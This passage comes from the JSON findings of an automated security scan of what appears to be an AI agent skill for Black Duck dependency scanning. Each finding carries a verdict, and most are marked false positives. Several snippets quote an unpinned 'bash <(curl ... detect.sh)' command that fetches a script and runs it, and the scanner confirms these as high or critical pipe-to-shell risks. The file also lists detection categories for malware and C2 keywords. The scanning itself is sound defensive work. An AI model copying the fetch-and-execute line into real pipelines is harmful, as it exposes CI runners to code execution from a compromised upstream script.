SCA","category":"external_commands","line_end":167,"severity":"medium","line_start":166},{"id":"external_commands:SKILL.md:167:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `assets/ci_integration/jenkins_pipeline.groovy` - Jenkins pipeline with Black Duck integration","category":"external_commands","line_end":168,"severity":"medium","line_start":167},{"id":"external_commands:SKILL.md:168:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `assets/policy_templates/` - Pre-configured security and compliance policies","category":"external_commands","line_end":169,"severity":"medium","line_start":168},{"id":"external_commands:SKILL.md:169:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `assets/blackduck_config.yml` - Recommended Black Duck Detect configuration","category":"external_commands","line_end":175,"severity":"medium","line_start":169},{"id":"external_commands:SKILL.md:175:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":183,"severity":"medium","line_start":175},{"id":"external_commands:SKILL.md:183:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":187,"severity":"medium","line_start":183},{"id":"external_commands:SKILL.md:187:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":194,"severity":"medium","line_start":187},{"id":"external_commands:SKILL.md:194:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":198,"severity":"medium","line_start":194},{"id":"external_commands:SKILL.md:198:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":205,"severity":"medium","line_start":198},{"id":"external_commands:SKILL.md:205:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":209,"severity":"medium","line_start":205},{"id":"external_commands:SKILL.md:209:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":216,"severity":"medium","line_start":209},{"id":"external_commands:SKILL.md:216:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":220,"severity":"medium","line_start":216},{"id":"external_commands:SKILL.md:220:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":227,"severity":"medium","line_start":220},{"id":"external_commands:SKILL.md:227:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":233,"severity":"medium","line_start":227},{"id":"external_commands:SKILL.md:233:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- **GitHub Actions**: Use `synopsys-sig/detect-action@v1` with policy enforcement","category":"external_commands","line_end":238,"severity":"medium","line_start":233},{"id":"external_commands:SKILL.md:238:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"See `assets/ci_integration/` for ready-to-use pipeline configurations.","category":"external_commands","line_end":271,"severity":"medium","line_start":238},{"id":"external_commands:SKILL.md:271:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"2. Configure license compliance rules using `assets/policy_templates/`","category":"external_commands","line_end":278,"severity":"medium","line_start":271},{"id":"external_commands:SKILL.md:278:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":285,"severity":"medium","line_start":278},{"id":"external_commands:SKILL.md:285:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":291,"severity":"medium","line_start":285},{"id":"external_commands:SKILL.md:291:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":302,"severity":"medium","line_start":291},{"id":"external_commands:SKILL.md:302:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":318,"severity":"medium","line_start":302},{"id":"external_commands:SKILL.md:318:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- Consult `references/license_risk_guide.md` for risk assessment","category":"external_commands","line_end":328,"severity":"medium","line_start":318},{"id":"external_commands:SKILL.md:328:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- Use `--detect.detector.search.depth` to increase search depth","category":"external_commands","line_end":334,"severity":"medium","line_start":328},{"id":"external_commands:SKILL.md:334:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- Increase `--detect.parallel.processors` for multi-core systems","category":"external_commands","line_end":342,"severity":"medium","line_start":334},{"id":"external_commands:SKILL.md:342:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"For detailed vulnerability research, consult `references/remediation_strategies.md`.","category":"external_commands","line_end":353,"severity":"medium","line_start":342},{"id":"network:SKILL.md:21:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html","category":"network","line_end":21,"severity":"low","line_start":21},{"id":"network:SKILL.md:22:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- https://owasp.org/www-project-dependency-check/","category":"network","line_end":22,"severity":"low","line_start":22},{"id":"network:SKILL.md:23:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- https://nvd.nist.gov/","category":"network","line_end":23,"severity":"low","line_start":23},{"id":"network:SKILL.md:24:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- https://www.cisa.gov/sbom","category":"network","line_end":24,"severity":"low","line_start":24},{"id":"network:SKILL.md:42:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":42,"severity":"low","line_start":42},{"id":"network:SKILL.md:53:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":53,"severity":"low","line_start":53},{"id":"network:SKILL.md:189:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":189,"severity":"low","line_start":189},{"id":"network:SKILL.md:280:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":280,"severity":"low","line_start":280},{"id":"network:SKILL.md:293:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":293,"severity":"low","line_start":293},{"id":"network:SKILL.md:299:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":299,"severity":"low","line_start":299},{"id":"network:SKILL.md:385:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- [Black Duck Documentation](https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html)","category":"network","line_end":385,"severity":"low","line_start":385},{"id":"network:SKILL.md:386:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- [Black Duck Detect](https://sig-product-docs.synopsys.com/bundle/integrations-detect/page/introduc","category":"network","line_end":386,"severity":"low","line_start":386},{"id":"network:SKILL.md:387:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- [OWASP Dependency-Check](https://owasp.org/www-project-dependency-check/)","category":"network","line_end":387,"severity":"low","line_start":387},{"id":"network:SKILL.md:388:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- [National Vulnerability Database](https://nvd.nist.gov/)","category":"network","line_end":388,"severity":"low","line_start":388},{"id":"network:SKILL.md:389:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- [SBOM Standards (CISA)](https://www.cisa.gov/sbom)","category":"network","line_end":389,"severity":"low","line_start":389},{"id":"network:SKILL.md:390:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- [CycloneDX SBOM Standard](https://cyclonedx.org/)","category":"network","line_end":390,"severity":"low","line_start":390},{"id":"network:SKILL.md:391:hardcoded-url","file":"SKILL.md","pattern":"Hardcoded URL","snippet":"- [SPDX License List](https://spdx.org/licenses/)","category":"network","line_end":391,"severity":"low","line_start":391},{"id":"blocker:SKILL.md:357:malware-type-keywords","file":"SKILL.md","pattern":"Malware type keywords","snippet":"- Backdoored dependencies","category":"blocker","line_end":357,"severity":"high","line_start":357},{"id":"blocker:SKILL.md:336:system-reconnaissance","file":"SKILL.md","pattern":"System reconnaissance","snippet":"- Use intelligent/rapid scan mode for faster feedback","category":"blocker","line_end":336,"severity":"low","line_start":336},{"id":"blocker:SKILL.md:369:system-reconnaissance","file":"SKILL.md","pattern":"System reconnaissance","snippet":"- Incident response (rapid vulnerability identification)","category":"blocker","line_end":369,"severity":"low","line_start":369}],"finding_verdicts":[{"id":"filesystem:assets/blackduck_config.yml:29:hidden-file-access","reason":"The path is an exclusion pattern for dependency scanning or policy matching. It prevents scanning generated directories and does not read hidden files.","verdict":"false_positive","confidence":0.96},{"id":"filesystem:assets/blackduck_config.yml:33:hidden-file-access","reason":"The path is an exclusion pattern for dependency scanning or policy matching. It prevents scanning generated directories and does not read hidden files.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:assets/blackduck_config.yml:11:certificate-key-files","reason":"The configuration sets Black Duck trust.cert to false, preserving certificate verification. It does not reference, read, or embed a certificate or private key file.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci_integration/github_actions.yml:110:ruby-shell-backtick-execution","reason":"These are JavaScript template literals that format repository metadata for a pull request comment. They do not invoke Ruby, a shell, or an external command.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci_integration/github_actions.yml:111:ruby-shell-backtick-execution","reason":"These are JavaScript template literals that format repository metadata for a pull request comment. They do not invoke Ruby, a shell, or an external command.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci_integration/github_actions.yml:92:shell-command-substitution","reason":"The substitution runs a fixed local utility to read generated scan status or the current date. It does not incorporate untrusted text into a command name or shell syntax.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/ci_integration/github_actions.yml:70:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"env_access:assets/ci_integration/github_actions.yml:110:environment-variable-access-dot-notation","reason":"The JavaScript reads non-secret project name and version variables to format a pull request comment. It does not read an environment file or expose credentials.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/ci_integration/github_actions.yml:111:environment-variable-access-dot-notation","reason":"The JavaScript reads non-secret project name and version variables to format a pull request comment. It does not read an environment file or expose credentials.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/ci_integration/github_actions.yml:110:environment-variable-object","reason":"The JavaScript reads non-secret project name and version variables to format a pull request comment. It does not read an environment file or expose credentials.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/ci_integration/github_actions.yml:111:environment-variable-object","reason":"The JavaScript reads non-secret project name and version variables to format a pull request comment. It does not read an environment file or expose credentials.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/ci_integration/github_actions.yml:41:git-platform-tokens","reason":"The workflow passes GitHub's scoped token to the expected scanning or pull request action. Repository permissions are explicitly limited, and the token is not printed or sent to an unrelated endpoint.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/ci_integration/github_actions.yml:103:git-platform-tokens","reason":"The workflow passes GitHub's scoped token to the expected scanning or pull request action. Repository permissions are explicitly limited, and the token is not printed or sent to an unrelated endpoint.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:assets/ci_integration/github_actions.yml:110:environment-file-access","reason":"The JavaScript reads non-secret project name and version variables to format a pull request comment. It does not read an environment file or expose credentials.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:assets/ci_integration/github_actions.yml:111:environment-file-access","reason":"The JavaScript reads non-secret project name and version variables to format a pull request comment. It does not read an environment file or expose credentials.","verdict":"false_positive","confidence":0.96},{"id":"blocker:assets/ci_integration/github_actions.yml:70:pipe-to-shell-pattern","reason":"The CI template pipes a mutable network response directly into Bash without a pinned version or integrity check. A compromised upstream response would execute with runner privileges.","verdict":"confirmed","severity":"critical","confidence":0.99},{"id":"external_commands:assets/ci_integration/gitlab_ci.yml:121:shell-command-substitution","reason":"The substitution runs a fixed local utility to read generated scan status or the current date. It does not incorporate untrusted text into a command name or shell syntax.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci_integration/gitlab_ci.yml:151:shell-command-substitution","reason":"The substitution runs a fixed local utility to read generated scan status or the current date. It does not incorporate untrusted text into a command name or shell syntax.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/ci_integration/gitlab_ci.yml:30:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:assets/ci_integration/gitlab_ci.yml:85:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:assets/ci_integration/gitlab_ci.yml:181:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:assets/ci_integration/jenkins_pipeline.groovy:90:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"network:assets/ci_integration/jenkins_pipeline.groovy:143:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"filesystem:assets/ci_integration/jenkins_pipeline.groovy:34:hidden-file-access","reason":"The path is a workspace-local cache directory for the Black Duck installer. Creating or using this named directory is expected pipeline behavior, not covert file access.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci-config-template.yml:298:ruby-shell-backtick-execution","reason":"The backticks format artifact names inside a generated Markdown report. They are within a quoted heredoc and do not execute shell commands.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci-config-template.yml:301:ruby-shell-backtick-execution","reason":"The backticks format artifact names inside a generated Markdown report. They are within a quoted heredoc and do not execute shell commands.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci-config-template.yml:304:ruby-shell-backtick-execution","reason":"The backticks format artifact names inside a generated Markdown report. They are within a quoted heredoc and do not execute shell commands.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci-config-template.yml:307:ruby-shell-backtick-execution","reason":"The backticks format artifact names inside a generated Markdown report. They are within a quoted heredoc and do not execute shell commands.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci-config-template.yml:310:ruby-shell-backtick-execution","reason":"The backticks format artifact names inside a generated Markdown report. They are within a quoted heredoc and do not execute shell commands.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci-config-template.yml:134:shell-command-substitution","reason":"The substitution runs a fixed local utility to read generated scan status or the current date. It does not incorporate untrusted text into a command name or shell syntax.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci-config-template.yml:250:shell-command-substitution","reason":"The substitution runs a fixed local utility to read generated scan status or the current date. It does not incorporate untrusted text into a command name or shell syntax.","verdict":"false_positive","confidence":0.96},{"id":"external_commands:assets/ci-config-template.yml:291:shell-command-substitution","reason":"The substitution runs a fixed local utility to read generated scan status or the current date. It does not incorporate untrusted text into a command name or shell syntax.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/ci-config-template.yml:240:hardcoded-url","reason":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges.","verdict":"confirmed","severity":"high","confidence":0.98},{"id":"filesystem:assets/ci-config-template.yml:323:node-js-fs-operations","reason":"The GitHub script reads a fixed, workspace-local generated report before posting it to the current pull request. No attacker-controlled path or sensitive file is accessed.","verdict":"false_positive","confidence":0.96},{"id":"filesystem:assets/ci-config-template.yml:323:synchronous-file-operations","reason":"The GitHub script reads a fixed, workspace-local generated report before posting it to the current pull request. No attacker-controlled path or sensitive file is accessed.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/ci-config-template.yml:164:git-platform-tokens","reason":"The token is supplied through GitHub Secrets to the Gitleaks action for its documented workflow integration. The template does not log or exfiltrate the token.","verdict":"false_positive","confidence":0.96},{"id":"blocker:assets/ci-config-template.yml:240:pipe-to-shell-pattern","reason":"The CI template pipes a mutable network response directly into Bash without a pinned version or integrity check. A compromised upstream response would execute with runner privileges.","verdict":"confirmed","severity":"critical","confidence":0.99},{"id":"network:assets/policy_templates/security_policy.json:2:hardcoded-url","reason":"The URL declares the JSON Schema dialect for the policy document. It is metadata and does not initiate a network request.","verdict":"false_positive","confidence":0.96},{"id":"filesystem:assets/policy_templates/security_policy.json:154:hidden-file-access","reason":"The path is an exclusion pattern for dependency scanning or policy matching. It prevents scanning generated directories and does not read hidden files.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:43:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:44:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:45:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:73:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:118:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:119:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:151:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:191:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:192:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:193:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:217:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:260:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:261:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"network:assets/rule-template.yaml:288:hardcoded-url","reason":"The hardcoded URL is a documentation reference to OWASP, CWE, or a security cheat sheet in a rule template. The template does not contact that URL.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:148:environment-variable-access-dot-notation","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:148:environment-variable-object","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:147:python-environment-access","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:162:python-environment-access","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:132:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:147:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:148:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:156:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:157:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:162:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:163:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:164:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"env_access:assets/rule-template.yaml:165:generic-api-secret-keys","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"sensitive:assets/rule-template.yaml:148:environment-file-access","reason":"This rule template uses environment-variable access as the recommended fix for a hardcoded-secret detector. It contains placeholders only and does not read marketplace runtime secrets.","verdict":"false_positive","confidence":0.96},{"id":"blocker:assets/rule-template.yaml:70:system-reconnaissance","reason":"The scanner matched words inside SQL injection detection examples. These examples explain vulnerable and parameterized queries and perform no reconnaissance.","verdict":"false_positive","confidence":0.96},{"id":"blocker:assets/rule-template.yaml:71:system-reconnaissance","reason":"The scanner matched words inside SQL injection detection examples. These examples explain vulnerable and parameterized queries and perform no reconnaissance.","verdict":"false_positive","confidence":0.96},{"id":"blocker:assets/rule-template.yaml:83:system-reconnaissance","reason":"The scanner matched words inside SQL injection detection examples. These examples explain vulnerable and parameterized queries and perform no reconnaissance.","verdict":"false_positive","confidence":0.96},{"id":"blocker:assets/rule-template.yaml:84:system-reconnaissance","reason":"The scanner matched words inside SQL injection detection examples. These examples explain vulnerable and parameterized queries and perform no reconnaissance.","verdict":"false_positive","confidence":0.96},{"id":"blocker:assets/rule-template.yaml:89:system-reconnaissance","reason":"The scanner matched words inside SQL injection detection examples. These examples explain vulnerable and parameterized queries and perform no reconnaissance.","verdict":"false_positive","confidence":0.96},{"id":"blocker:assets/rule-template.yaml:90:system-reconnaissance","reason":"The scanner matched words inside SQL injection detection examples. These examples explain vulnerable and parameterized queries and perform no reconnaissance.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/cve_cwe_owasp_mapping.md:336:metasploit-framework","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/cve_cwe_owasp_mapping.md:195:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/cve_cwe_owasp_mapping.md:50:network-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/cve_cwe_owasp_mapping.md:238:network-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"scripts:references/EXAMPLE.md:138:document-write-injection","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"scripts:references/EXAMPLE.md:137:innerhtml-assignment-xss-risk","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:423:python-environment-access","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:423:generic-api-secret-keys","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:424:generic-api-secret-keys","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:425:generic-api-secret-keys","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:427:generic-api-secret-keys","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:430:generic-api-secret-keys","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:432:generic-api-secret-keys","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:437:generic-api-secret-keys","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"env_access:references/EXAMPLE.md:444:generic-api-secret-keys","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:276:c2-keywords","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:97:system-reconnaissance","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:113:system-reconnaissance","reason":"This reference contrasts vulnerable and remediated code for security education. The snippet is non-executable documentation and is not part of a runtime component.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:242:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:298:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:301:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:305:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged behavior.","verdict":"false_positive","confidence":0.96},{"id":"blocker:references/EXAMPLE.md:314:system-reconnaissance","reason":"The term appears in defensive vulnerability, incident-response, or supply chain guidance. The surrounding prose describes threats or mitigations and does not perform the flagged 